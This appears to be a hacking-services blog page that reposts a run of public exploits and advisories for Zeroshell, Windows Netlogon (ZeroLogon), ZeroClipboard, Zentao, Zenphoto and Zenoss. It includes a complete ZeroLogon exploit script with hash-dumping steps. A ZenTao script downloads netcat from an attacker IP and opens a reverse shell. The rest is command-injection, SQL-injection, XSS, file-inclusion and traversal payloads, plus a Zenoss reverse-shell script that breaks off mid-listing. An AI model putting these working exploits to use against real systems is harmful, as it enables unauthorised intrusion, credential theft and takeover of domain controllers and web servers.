####################################################################################################################################
# Exploit Title: Zeroshell - Net Services Unauthenticated Remote Code Execution | RCE
# Date: 13.01.2017
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.zeroshell.org
# Software Link: www.zeroshell.org/download/
# Version: 3.6.0 & 3.7.0
####################################################################################################################################
Introduction
Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.
Vulnerabilities: Unauthenticated Remote Code Execution | RCE
RCE details:
####################################################################################################################################
RCE 1
URL
http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW=
METHOD
Get,Post
PARAMETER
User
PAYLOAD
%27%26cat%20/etc/passwd%26%27
####################################################################################################################################
RCE 2
URL
http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27
METHOD
Get
PARAMETER
x509type
PAYLOAD
%27%26cat%20/etc/passwd%26%27
####################################################################################################################################
RCE 3
URL
http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22
METHOD
Get
PARAMETER
type
PAYLOAD
%22%26cat%20/etc/passwd%26%22
####################################################################################################################################
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863118133
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)
#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException
class Exploit:
def __init__(
self,
name='',
address='',
attempts=2000,
password=''
):
name = name.rstrip('$')
self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
.ServerSecureChannel
self.authenticator = self.getAuthenticator(stamp=0)
self.clearNewPasswordBlob = b'\x00' * 516
self.primaryName = ('\\\\%s' % name) + '\x00'
self.accountName = ('%s$' % name) + '\x00'
self.computerName = name + '\x00'
self.clientCredential = b'\x00' * 8
self.clientChallenge = b'\x00' * 8
self.negotiateFlags = 0x212fffff
self.address = address
self.max = attempts
self.dce = None
self.sessionKey = None
self.clientStoredCredential = None
self.password = password
def encodePassword(self, password):
if isinstance(password, str):
password = password.encode('utf-8')
return b'\x00' * (512 - len(password))\
+ password \
+ pack('<L', len(password))
def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = creds
authenticator['Timestamp'] = stamp
return authenticator
def serverReqChallenge(self):
try:
binding = epm.hept_map(
self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'
)
self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
self.dce.connect()
self.dce.bind(nrpc.MSRPC_UUID_NRPC)
return nrpc.hNetrServerReqChallenge(
self.dce,
self.primaryName,
self.computerName,
self.clientChallenge
)
except BaseException as ex:
self.logError(ex)
def serverAuthenticate(self):
try:
auth = nrpc.hNetrServerAuthenticate3(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.clientCredential,
self.negotiateFlags
)
assert auth['ErrorCode'] == 0
self.logInfo('successfully authenticated')
return True
except nrpc.DCERPCSessionError as ex:
self.dce = None
if ex.get_error_code() == 0xc0000022:
return None
else:
self.logFail(ex.get_error_code())
except BaseException as ex:
self.dce = None
self.logFail(ex)
self.dce = None
def serverPasswordSet(self):
try:
return nrpc.hNetrServerPasswordSet2(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.authenticator,
self.clearNewPasswordBlob
)
except BaseException as ex:
self.logError(ex)
def authenticate(self):
self.logInfo(
'checking target, attempting to authenticate %d max
attempts' % self.max
)
for attempt in range(0, self.max):
self.logInfo('attempt %d' % attempt)
self.serverReqChallenge()
self.serverAuthenticate()
if self.dce is not None:
break
if self.dce:
return True
else:
self.logError('failed to authenticate')
def exploit(self):
self.logInfo('attempting password reset')
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully reset password')
else:
self.logError('failed to reset password')
return self
def ComputeNetlogonCredentialAES(self, challenge):
return nrpc.ComputeNetlogonCredentialAES(
challenge,
self.sessionKey
)
def logInfo(self, message):
sys.stdout.write("[+] %s\n" % str(message))
return self
def logError(self, message):
sys.stderr.write("[-] error %s\n" % str(message))
def logFail(self, message):
sys.stderr.write("[!] failure %s\n" % str(message))
sys.exit(2)
def restore(self):
self.logInfo('attempting to restore password')
self.clientChallenge = b'12345678'
try:
self.primaryName = NULL
challenge = self.serverReqChallenge()
self.sessionKey = nrpc.ComputeSessionKeyAES(
'', self.clientChallenge, challenge['ServerChallenge']
)
self.clientCredential = self.ComputeNetlogonCredentialAES(
self.clientChallenge
)
try:
self.serverAuthenticate()
except Exception as e:
if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
raise
self.logInfo('restoring password')
self.clientStoredCredential = pack('<Q', unpack('<Q',
self.clientCredential)[0] + 10)
self.authenticator = self.getAuthenticator(
creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
)
self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
self.encodePassword(self.password)
)
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully restored password')
else:
self.logError('failed to restore password')
except Exception as ex:
self.logError(ex)
return self
if __name__ == '__main__':
info = """
NOTE - Exploitation will break the DC until restored, recommended guidelines:
1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>
2. Exploit the DC - this will break the DC until restored:
cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>
3. Dump the DC - for the DA hashes, this will not contain the
machine hex-pass:
secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>
4. Dump the DC again - use the DA hash to get the machines hex-pass:
secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>
5. Restore target - this fixes the DC:
cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>
-hex <HEXPASS>
"""
parser = argparse.ArgumentParser(
description='CVE-2020-1472 ZeroLogon Exploit - Netlogon
Elevation of Privilege',
add_help=True
)
try:
parser.add_argument('-do', default='check', action='store',
help='What to do (default check):
[check|restore|exploit]')
parser.add_argument('-target', action='store',
help='NETBIOS name of target DC (not the FQDN)')
parser.add_argument('-ip', action='store',
help='IP address of target DC')
parser.add_argument('-password', default='', action='store',
help='The plaintext password to use to
reset the DC')
parser.add_argument('-hex', default='', action='store',
help='The hex password to use to restore
the DC (recommended)')
parser.add_argument('-max', default=2000, action='store',
help='Max attempts to authenticate with
the DC (usually ~300 or less)')
if len(sys.argv) < 3:
parser.print_help()
print(info)
sys.exit(1)
options = parser.parse_args()
if options.do.lower() == 'check':
Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
).authenticate()
elif options.do.lower() == 'exploit':
exp = Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
)
if exp.authenticate():
exp.exploit()
elif options.do.lower() == 'restore':
if options.hex != '' and options.password == '':
options.password = unhexlify(options.hex)
if options.password != '':
exp = Exploit(
name=options.target,
address=options.ip,
password=options.password
).restore()
else:
parser.print_help()
except Exception as error:
sys.stderr.write('[-] error in main %s\n' % str(error))
source: https://www.securityfocus.com/bid/58116/info
ZeroClipboard is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ZeroClipboard versions prior to 1.1.7 are vulnerable.
http://www.example.com/themes/default/htdocs/flash/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/filemanager/views/js/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)
# Exploit Author: mister0xf
# Date: 2022-10-8
# Software Link: https://github.com/easysoft/zentaopms
# Version: tested on 17.0 (probably works also on newer/older versions)
# Tested On: Kali Linux 2022.2
# Exploit Tested Using: Python 3.10.4
# Vulnerability Description:
# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing
# remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver
# Vulnerable Source Code:
# /module/repo/model.php:
# [...]
# $client = $this->post->client; // <-- client is taken from the POST request
# [...]
# elseif($scm == 'Git')
# {
# if(!is_dir($path))
# {
# dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);
# return false;
# }
#
# if(!chdir($path))
# {
# if(!is_executable($path))
# {
# dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);
# return false;
# }
# dao::$errors['path'] = $this->lang->repo->error->path;
# return false;
# }
#
# $command = "$client tag 2>&1"; // <-- command is injected here
# exec($command, $output, $result);
import requests,sys
import hashlib
from urllib.parse import urlparse
from bs4 import BeautifulSoup
def banner():
print('''
::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: ::::::::
:+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+
+#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#
######### ########## ### #### ######## ########### ### ### ########
''')
def usage():
print('Usage: zenciao user password http://127.0.0.1/path')
def main():
if ((len(sys.argv)-1) != 3):
usage()
banner()
exit()
#proxy = {'http':'http://127.0.0.1:8080'}
banner()
username = sys.argv[1]
password = sys.argv[2]
target = sys.argv[3]
# initialize session object
session = requests.session()
home_url = target+'/index.php'
rand_url = target+'/index.php?m=user&f=refreshRandom&t=html'
login_url = target+'/index.php?m=user&f=login&t=html'
create_repo_url = target+'/index.php?m=repo&f=create&objectID=0'
r1 = session.get(home_url)
soup = BeautifulSoup(r1.text, "html.parser")
script_tag = soup.find('script')
redirect_url = script_tag.string.split("'")[1]
r2 = session.get(target+redirect_url)
# get random value
session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
res = session.get(rand_url)
rand = res.text
# compute md5(md5(password)+rand)
md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode())
# login request
post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""}
my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html'
session.headers.update({'Referer': my_referer})
session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
response = session.post(login_url, data=post_data)
# exploit rce
# devops repo page
r2 = session.get(create_repo_url)
git_test_dir = '/home/'
command = 'whoami;'
exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""}
r3 = session.post(create_repo_url, data=exploit_post_data)
print(r3.content)
if __name__ == '__main__':
main()
# Exploit Title: ZenTao Pro 8.8.2 - Command Injection
# Date: 2020-07-01
# Exploit Author: Daniel Monzón & Melvin Boers
# Vendor Homepage: https://www.zentao.pm/
# Version: 8.8.2
# Tested on: Windows 10 / WampServer
# Other versions like pro or enterprise edition could be affected aswell
# Netcat is needed to use this exploit
import requests
import hashlib
import urllib.parse
host = 'http://192.168.223.132'
username = 'admin'
password = 'Test123!@#'
name = 'Test2'
command = 'certutil.exe+-urlcache+-f+-split+http%3A%2F%2F192.168.223.131%2Fnc.exe+C%3A%5Cbad.exe+%26%26'
command2 = 'C:\\bad.exe 192.168.223.131 9001 -e cmd.exe &&'
git_path = 'C%3A%5CProgramData'
x = requests.session() # Create a session, as needed because we need admin rights.
def sign_in(url, username, password):
password = hashlib.md5(password.encode('utf-8')).hexdigest() # We need to md5 encode the password in order to sign in
proxy = {'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080'} # Just for debugging phase
credentials = {'account' : username, 'password' : password} # The credentials we need
path = url + '/zentao/user-login.html' # URL + path
x.post(path, data=credentials, proxies=proxy, verify=False) # Send the post request to sign in
return '[*] We are signed in!'
def go_to_repo(url):
path = url + '/zentao/repo-browse.html'
x.get(path, verify=False)
print('[*] Getting to repo path')
def create_repo(url, name, command):
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin':'http://192.168.223.132',
'Referer':'http://192.168.223.132/pro/repo-create.html',
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
'Accept-Language':'en-US,en;q=0.5'}
cookies = {'ajax_lastNext':'on',
'windowWidth':'1846',
'windowHeight':'790'}
path = url + '/zentao/repo-create.html'
parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command
x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)
print('[*] Creating the repo')
def get_shell(url, name, command):
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin':'http://192.168.223.132',
'Referer':'http://192.168.223.132/pro/repo-create.html',
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
'Accept-Language':'en-US,en;q=0.5'}
cookies = {'ajax_lastNext':'on',
'windowWidth':'1846',
'windowHeight':'790'}
path = url + '/zentao/repo-create.html'
parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command2
x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)
print('[*] Check your netcat listener!')
def main():
switch = True
if switch:
sign_in(host, username, password)
if switch:
go_to_repo(host)
if switch:
create_repo(host, name, command)
if switch:
get_shell(host, name, command2)
switch = False
if __name__ == "__main__":
main()
Exploit Title: Zenphoto 1.6 - Multiple stored XSS
Application: Zenphoto-1.6 xss poc
Version: 1.6
Bugs: XSS
Technology: PHP
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
###XSS-1###
steps:
1. create new album
2. write Album Description : <iframe src="https://14.rs"></iframe>
3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/
=====================================================
###XSS-2###
steps:
1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
2.change postal code as <script>alert(4)</script>
3.if admin user information import as html , xss will trigger
poc video : https://youtu.be/JKdC980ZbLY
Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10
SQL Injection
=============
There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.
- visit zp-core/admin-options.php?saved&tab=gallery
alternatively visit zp-core/admin-options.php?saved&tab=image
- Set "Sort gallery by" to "Custom"
- set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
- visit zp-core/admin-upload.php?page=upload&tab=http&type=images
- alternatively, visiting either of these will also trigger the injection:
/
zp-core/admin-edit.php
zp-core/admin-users.php?page=users
zp-core/admin-themes.php
The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs
XSS 1
=====
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
The payload must first be HTML entity-encoded, and then URL encoded.
XSS 2
=====
http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!
Directory Traversal
===================
For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php
Execute Function
================
An admin user can execute any function they want via this URL (there is
no CSRF protection for it):
localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo
This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing of CSRF protection.
Source
======
http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Zenphoto 1.4.11
Fixed in: 1.4.12
Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
zenphoto-1.4.12.zip
Vendor Website: http://www.zenphoto.org/
Vulnerability Type: RFI
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to 03/15/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
vulnerable to remote file inclusion. An admin account is required.
3. Details
Description
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
When downloading a log file, the input is not properly sanitized, leading to
RFI.
An admin account is required, and allow_url_fopen must be set to true - which
is the default setting.
In old versions of PHP, this would additionally lead to LFI via null byte
poisoning or path expansion, regardless of allow_url_fopen settings.
Proof of Concept
GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
Code
// admin-logs.php (sanitize(x, 3) only strips out tags)
case 'download_log':
$zipname = sanitize($_GET['tab'], 3) . '.zip';
if (class_exists('ZipArchive')) {
$zip = new ZipArchive;
$zip->open($zipname, ZipArchive::CREATE);
$zip->addFile($file, basename($file));
$zip->close();
ob_get_clean();
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/zip");
header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($zipname));
readfile($zipname);
// remove zip file from temp path
unlink($zipname);
exit;
} else {
include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
$zip = new ZipStream($zipname);
$zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
$zip->finish();
}
break;
4. Solution
To mitigate this issue please upgrade at least to version 1.4.12:
https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
01/29/2016 Vendor replies
02/23/2016 Vendor sends fix for verification
02/23/2016 Suggested improvements for attempted fix
02/29/2016 Delayed Disclosure
03/14/2016 Vendor releases fix
03/15/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt
Vendor:
====================
www.zenphoto.org
Product:
===================
Zenphoto 1.4.10
Vulnerability Type:
========================
Local File Inclusion
CVE Reference:
==============
N/A
Vulnerability Details:
======================
Zen Photos pluginDoc.php PHP file is vulnerable to local file inclusion
that allows attackers
to read arbitrary server files outside of the current web directory by
injecting "../" directory traversal
characters, which can lead to sensitive information disclosure, code
execution or DOS on the victims web server.
Local File Inclusion Codes:
==========================
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../xampp/phpinfo
Disclosure Timeline:
=====================
Vendor Notification: November 10, 2015
December 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
High
Description:
=====================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Zenphoto 1.4.10
Vulnerable Parameter(s): [+] extension
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/47528/info
Zenphoto is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
source: https://www.securityfocus.com/bid/65126/info
ZenPhoto is prone to an SQL-injection vulnerability and multiple path-disclosure vulnerabilities.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The attacker may gain access to potentially sensitive information that can aid in other attacks.
ZenPhoto 1.4.4 is vulnerable; other versions may also be affected.
http://www.example.com/zenphoto/index.php?p=search&date=[SQL Injection]
source: https://www.securityfocus.com/bid/58078/info
Zenphoto is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Zenphoto 1.4.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection]
source: https://www.securityfocus.com/bid/55755/info
Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected.
http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>
source: https://www.securityfocus.com/bid/54793/info
Zenoss is prone to the following security vulnerabilities:
1. Multiple arbitrary command-execution vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. An open-redirection vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple information-disclosure vulnerabilities
6. A code-execution vulnerability
An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information.
Zenoss 3.2.1 and prior are vulnerable.
http://www.example.com/zport/About/showDaemonXMLConfig?daemon=uname%20-a%26
http://www.example.com/zport/dmd/Events/Users/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/Events/Users/eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/Events/Status/Snmp/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/ZenEventManager/listEventCommands?tableName=eventCommands&sortedHeader=primarySortKey&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/backupInfo?tableName=backupTable&sortedHeader=fileName&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script>
http://www.example.com/zport/acl_users/cookieAuthHelper/login?came_from=http%3a//example%2ecom/%3f
http://www.example.com/zport/About/viewDaemonLog?daemon=../../../var/log/mysqld
http://www.example.com/zport/About/viewDaemonConfig?daemon=../../../../etc/syslog
http://www.example.com/zport/About/editDaemonConfig?daemon=../../../../etc/syslog
http://www.example.com/zport/RenderServer/plugin?name=../../../../../../tmp/arbitrary-python-file
http://www.example.com/zport/dmd/ZenEventManager
http://www.example.com/manage
source: https://www.securityfocus.com/bid/54793/info
Zenoss is prone to the following security vulnerabilities:
1. Multiple arbitrary command-execution vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. An open-redirection vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple information-disclosure vulnerabilities
6. A code-execution vulnerability
An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive-information.
Zenoss 3.2.1 and prior are vulnerable.
# Zenoss <= 3.2.1 Remote Post-Authentication Command Execution #################
# o Requires: Credentials for a user with "ZenManager" or "Manager" roles.
# o Tested: Zenoss 3.2.1
# o Default port: 8080
# Brendan Coles <bcoles at gmail dot com> # 2012-03-14
################################################################################
import socket, sys, random, time, re
#verbose = True
verbose = False
# usage
if len(sys.argv) < 6:
print "Zenoss <= 3.2.1 Remote Post-Authentication Command Execution"
print "[*] Usage: python "+sys.argv[0]+" <RHOST> <RPORT> <username> <password> <LHOST> <LPORT>"
print "[*] Example: python "+sys.argv[0]+" 192.168.1.10 8080 zenoss zenoss 192.168.1.1 4444"
sys.exit(0)
# zenoss details
RHOST = sys.argv[1]
RPORT = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]
# reverse shell
LHOST = sys.argv[5]
LPORT = int(sys.argv[6])
# random file name
filename = ""
for i in range(0,random.randint(10,20)):
filename = filename+chr(random.randint(97,122))
# connect to RHOST:RPORT
try:
socket.inet_aton(RHOST)
except socket.error:
print "[-] Error: Could not create socket."
sys.exit(1)
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((RHOST,RPORT))
except:
print "[-] Error: Could not connect to server"
sys.exit(1)
# Login and get cookie
if verbose: print "[*] Logging in"
request = "GET /zport/acl_users/cookieAuthHelper/login?__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
try:
# send request
s.sendto(request, (RHOST, RPORT))
data = s.recv(1024)
if verbose: print str(data)+"\r\n"
# get ginger cookie
m = re.search('(__ginger_snap=".+";)', data)
if not m:
raise Exception("[-] Error: Could not retrieve __ginger_snap cookie value")
else:
ginger_cookie = str(m.group(1))
except:
print "[-] Error: Login failed"
sys.exit(1)
# Add empty command to web interface
if verbose: print "[*] Adding command to Zenoss"
request = "GET /zport/dmd/ZenEventManager/commands/?id="+filename+"&manage_addCommand%3Amethod=+Add+&__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
try:
# send request
s.sendto(request, (RHOST, RPORT))
data = s.recv(1024)
if verbose: print str(data)+"\r\n"
m = re.search('(Bobo-Exception-Type: Unauthorized)', data)
if m: raise Exception("[-] Error: Incorrect username/password")
else: print "[+] Added command to Zenoss successfully"
except:
